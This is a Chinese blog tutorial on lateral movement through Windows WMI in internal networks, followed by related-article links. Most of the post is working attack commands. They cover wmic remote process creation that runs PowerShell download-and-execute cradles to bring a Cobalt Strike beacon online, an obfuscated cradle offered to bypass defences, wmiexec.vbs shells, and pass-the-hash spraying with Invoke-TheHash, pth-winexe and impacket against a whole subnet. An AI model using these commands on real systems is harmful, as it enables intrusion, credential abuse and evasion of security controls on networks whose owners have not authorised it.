WMI横向移动

已于 2024-01-11 16:34:16 修改
阅读量3.2k 收藏 6
点赞数
分类专栏: 内网渗透 文章标签: WMI 内网渗透 横向移动
于 2020-02-02 23:39:59 首次发布
本文为博主原创文章,未经博主允许不得转载。
本文链接:https://blog.csdn.net/lhh134/article/details/104150949
版权

在这里插入图片描述

0x01 WMI横向移动简介

简介

WMI全称“windows管理规范”,从win2003开始一直存在。它原本的作用是方便管理员对windows主机进行管理。因此在内网渗透中,我们可以使用WMI进行横向移动。

利用条件

1、WMI服务开启,端口135,默认开启。
2、防火墙允许135、445等端口通信。

0x02 windows自带wmic工具横向移动(推荐)

实际测试(wmic)
08 -> 03 不成功
03 -> 08 成功
08 -> 08 成功

wmic实现CS beacon上线

方式1(Scripted Web Delivery):

wmic /NODE:192.168.3.123 /user:"administrator" /password:"Aatest" PROCESS call create "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://192.168.3.86:80/a'))\""

在这里插入图片描述
在这里插入图片描述

方式2(payload generator):
1、通过生成powershell的“payload generator”
在这里插入图片描述

2、本地可以使用python开启web server,以便于powershell加载payload。
在这里插入图片描述

3、通过下列命令加载执行powershell。(payload后缀改为txt也可正常上线。)

wmic /NODE:192.168.3.123 /user:"administrator" /password:"Aatest" PROCESS call create "powershell -nop -exec bypass -c \"IEX(New-Object Net.WebClient).DownloadString('http://192.168.3.86:8000/payload.ps1');\""

在这里插入图片描述

小tips:
powershell执行的时候可以加一些混淆,能够起到一定程度上的bypass效果。

powershell -nop -exec bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://192.168.3.86:8000/payload.txt');"
powershell -nop -exec bypass -c "('IEX'+'(Ne'+'w-O'+'bject Ne'+'t.W'+'ebClien'+'t).Do'+'wnloadS'+'trin'+'g'+'('+'1vchttp://'+'192.168.3'+'.86:8000/'+'payl'+'o'+'a'+'d.'+'txt1v'+'c)'+';').REplaCE('1vc',[STRing][CHAR]39)|IeX"

在这里插入图片描述
CS正常上线。

0x03 通过外部工具实现WMI横向移动

一、wmiexec.vbs(推荐)

此脚本无论是在域环境下还是在工作组环境下都可正常使用。使用域账号或本地账号均可。
反弹shell:

cscript wmiexec.vbs /shell 192.168.3.123 administrator Aatest	//此处使用普通用户

在这里插入图片描述

命令执行:

cscript wmiexec.vbs /cmd 192.168.3.123 ggyao\administrator Aatest "ipconfig"	//此处使用域用户

在这里插入图片描述

二、Invoke-TheHash.ps1(推荐,批量)

使用已知管理员hash,批量撞指定网段机器,此方式同时适用于工作组和域环境。需要同时加载Invoke-WMIExec.ps1、Invoke-TheHash.ps1。(https://github.com/Kevin-Robertson/Invoke-TheHash)
1、将powershell脚本放到内网一台机器上,用python开一个web server。
在这里插入图片描述

2、加载脚本。

powershell -exec bypass
IEX (New-Object Net.WebClient).DownloadString('http://192.168.3.86:8000/Invoke-WMIExec.ps1');
IEX (New-Object Net.WebClient).DownloadString('http://192.168.3.86:8000/Invoke-TheHash.ps1');

在这里插入图片描述

3、利用已有管理员hash,批量撞指定网段机器。
域环境下:

PS C:\Users\Administrator> Invoke-TheHash -Type WMIExec -Target 192.168.3.0/24 -Domain ggyao -Username administrator -Hash e1c61709dffcf154ac9d77b5024f6d10

在这里插入图片描述

工作组环境下:

PS C:\Users\Administrator> Invoke-TheHash -Type WMIExec -Target 192.168.3.0/24 -Username administrator -Hash b4e535a9bb56bcc084602062c9e2a9d4

在这里插入图片描述

三、kali自带pth工具集(推荐)

工作组环境下(本地管理员):

pth-winexe  -U administrator%Aatest --system --ostype=1 //192.168.3.90 cmd

在这里插入图片描述

域环境下(域管用户):

pth-winexe  -U ggyao/administrator%Aatest --system --ostype=1 //192.168.3.90 cmd

在这里插入图片描述

四、wmicmd命令回显(工作组)

(https://github.com/nccgroup/WMIcmd)
主要用于工作组横向移动。

WMIcmd.exe -h 192.168.3.108 -u administrator -p Aatest -d . -c "ipconfig"

五、impacket套件

impacket套件是通过445端口进行通信的,不是135端口。
windows下:
(https://github.com/maaaaz/impacket-examples-windows)

域用户
wmiexec.exe -hashes :518B98AD4178A53695DC997AA02D455C 域名/administrator@192.168.3.123 "ipconfig"

Linux下:

工作组
python wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:518b98ad4178a53695dc997aa02d455c administrator@192.168.3.123 "ipconfig" 
域用户
python wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:518b98ad4178a53695dc997aa02d455c 域名/administrator@192.168.3.123 "ipconfig"
LQxdp
关注
专栏目录
第一百零八课:跨平台横向移动 [wmi利用]1
08-03
虽然WMI本身是Windows特有的,但攻击者可能通过模拟WMI协议或利用其他方式在非Windows系统上实现类似的功能,以达到横向移动的目的。 【总结】 WMI是Windows系统管理和自动化的重要工具,同时也是安全领域中攻击者...
内网安全:WMI协议与SMB协议横向移动
qq_61553520的博客
08-24 2434
此外,SMB协议还经过不断的发展和改进,最新的版本是SMB3,它引入了更高的性能和安全性特性。它是在局域网(LAN)中广泛使用的一种协议,最初由IBM开发,后来由微软引入并逐渐发展为现代的SMB协议。WMI协议的主要目标是提供一种统一的接口,使系统管理员和开发人员能够通过编程方式获取和控制Windows操作系统的各种管理信息。通过WMI协议,可以访问和操作计算机的硬件、操作系统、网络、进程、服务等各个方面的信息。SMB协议的作用是允许计算机之间共享文件和资源,并提供对这些共享资源的访问和管理。
WMI利用(横向移动
Ping_Pig的博客
11-09 1791
WMI利用(横向移动) 讲在前面:     上一篇文章我们简单的解释了什么是WMIWMI做什么,为什么使用WMI。本文是笔者在阅读国内部分的解释WMI横向移动的文章后写下的一篇文章,希望帮助同学们在攻防中进入横向移动后根据实际场景利用WMI来解决问题。在横向移动中的固定过程中一定离不开“信息收集”,然后分析信息根据实际场景(工作组或者域)来进行横向移动,至于使用什么工具,为什么使用这个工具,笔者使用WMI的意见。所以本文分为三个段落,信息收集、横向移动、部分意见。
内网渗透横向移动&Wmi横移&Smb横移&CME&ProxyChains
最新发布
2301_76227305的博客
08-07 968
以上便是本次横移的知识了。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
Windows 横向移动的常用技术
永远都没有了
07-06 1966
横向移动不仅仅是需要收集明文凭据,还需要收集密文凭据,在遇到防火墙受阻和端口限制的情况下,我们可以使用建立端口转发稳定的隧道来与目标进行通信,当用户拥有某些权限时,我们也可以扩展危害性,感染其他用户来进行横向移动
【内网安全-横向移动WMI-WMIC命令&相关内网工具
02-08 9073
横向移动-WMI-WMIC命令】wmic、impacket-wmiexec、wmicmd.exe、WMIHACKER
常见横向移动手法
qq_44657899的博客
11-08 3607
文章目录通过PsExec进行横向移动PsExec使用通过 WMIExec 来进⾏横向移动WMI使用方法 通过PsExec进行横向移动 PsExec 包含在 PsTools ⼯具包中,下载地址:https://download.sysinternals.com/files/PSTools.zip 通过 PsExec 可以在远程⽬标主机上执⾏命令,也可以将管理员权限提升到 System 权限以运⾏指定的程序。 PsExec 的基本原理是:通过管道在远程⽬标主机上创建⼀个 psexec 服务,并在本地磁盘中⽣成⼀
MoveScheduler:.NET 4.0计划的作业横向移动
03-08
MoveScheduler是另一个周末狂欢,它通过几种不同的计划任务方法专注于横向运动: 这〜4种技术各有利弊。 最值得注意的是,TaskScheduler库具有最多的优点。 它允许在事件触发器上,启动持久性上提升到NT AUTHORITY...
红蓝视角之横向移动_蓝队视角1
08-03
横向移动】在网络安全领域,是指攻击者在成功渗透到目标网络系统后,为了扩大控制范围,通过内部网络的其他设备进行进一步的攻击活动。这种行为通常发生在红队(攻击方)与蓝队(防御方)的对抗中。本文将从蓝队的...
渗透基础WMI学习笔记1
08-03
4. **横向移动**:在多主机环境中,WMI可以用来在不同的系统间进行权限提升和跨主机操作。 5. **持久化机制**:恶意软件可以利用WMI创建持久性,即使系统重启也能保持活动状态。 6. **数据窃取**:WMI可以用于检索...
CobaltStrike-BOF:信标BOF集合,用于学习窗户和钴击
03-20
2)WMI横向移动-Win32_Process创建与上一个概念相似,但有趣的学习经验。 采纳的代码 。此方法使用Win32_Process类。 3)WMI横向移动-事件订阅这使用WMI事件进行横向移动。大部分繁重的工作都是由完成的 4)按需C2...
内网横向——利用WMI进行内网横向
qq_55202378的博客
07-28 705
WMI(Windows Management Instrumentation,Windows管理规范)是一项核心的windows管理技术。从Windows 98开始,windows操作系统都支持WMI。用户可以通过WMI管理本地和远程计算机。Windows为远程传输WMI数据提供了两个可用的协议,即分布式组件对象模型()和windows远程管理(,WinRM),使得WMI对象的查询、事件注册、WMI类方法的执行和类的创建等都可以远程执行。
【内网安全】 横向移动&Wmi&Smb&CrackMapExec&ProxyChains&Impacket
今天是几号的博客
03-26 1249
在Win10中,wmic已经归入C:\Windows\System32\wbem文件夹,而环境变量只设置到C:\Windows\System32,因此找不到wmic。这几个端口都是与文件共享和打印机共享有关的端口,而且在这几个端口上经常爆发很严重的漏洞。安装使用:Microsoft Windows下的 win32k.sys是Windows子系统的内核部分,是一个内核模式设备驱动程序,它。
WMI(扫盲)
Jerry要好好学习
08-15 1277
以下内容,你几乎都可以通过google 百度很容易搜到,在此稍微做流水账整理了下。    读者在项目(多半是监控)中若需用到WMI,还需要深入survey 的~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
WMI(windows management instrumentation)利用思路简介
lanxia的博客
05-20 1580
wmi简述
【渗透测试笔记】之【内网渗透——横向移动WMI的使用】
AA8j的博客
11-18 4470
文章目录1. 自带WMIC2. Invoke-WmiCommand.ps13. Invoke-WMIMethod.ps14. wmiexec.vbs5. wmiexec.py 1. 自带WMIC 特点: 不会产生日志记录 没有回显,若要查看命令结果需要配合IPC$与type命令 wmic /node:10.1.1.2 /user:administrator /password:1234567.com process call create "cmd.exe /c ipconfig >c:\ip.t
如何让WMI进程独立固定端口
Sarah Cla的专栏
07-03 5306
**问题介绍** 最近在学习Powershell的取证,涉及到了WMI(Window Management Instrumentation)服务的监控。这个服务通常情况下是和一些其他的服务一块儿宿主到svchost的netsvcs进程中。查看该服务的可执行文件路径可以看到:C:\Windows\system32\svchost.exe -k netsvcs这样就无法将它与别的一些网络服务从进程上区
Windows安全基础——Windows WMI详解
Liu_Bruce的博客
12-11 4189
WMI(Windows Management Instrumentation, Windows管理规范)是Windows 2000/XP管理系统的核心,属于管理数据和操作的基础模块。设计WMI的初衷是达到一种通用性,通过WMI操作系统、应用程序等来管理本地或者远程资源。它支持分布式组件对象模型(DCOM,Distribution Components Object Model)和Windows远程管理(WinRM),用户可通过WMI服务访问、配置、管理和监视Windows所有资源的功能。对于其他的Win32
WMI协议
weixin_30500663的博客
07-10 2024
WMI协议 建议内网使用,外网445端口会被攻击 监控前提:需要在windows系统上开启wmi服务、允许访问135、445端口、需要客户设置一个administrators组的账号且账号密码变动时需修改RIIL系统等。 使用协议和端口:默认使用TCP协议,默认使用的端口是135,445. 取值方式:使用WQL语句获取数据 数据处理:WQL语句被执行后返回的数据,通过RIIL服务进行处...
Windows管理规范(WMI):跨平台横向移动与利用技巧
"第一百零八课主要探讨了跨平台横向移动技术,特别是通过Windows Management Instrumentation (WMI) 的利用。课程提到了MITRE ATT&CK框架,并提供了多个实验环境,包括不同版本的Windows服务器和客户端。课程内容...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

LQxdp

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值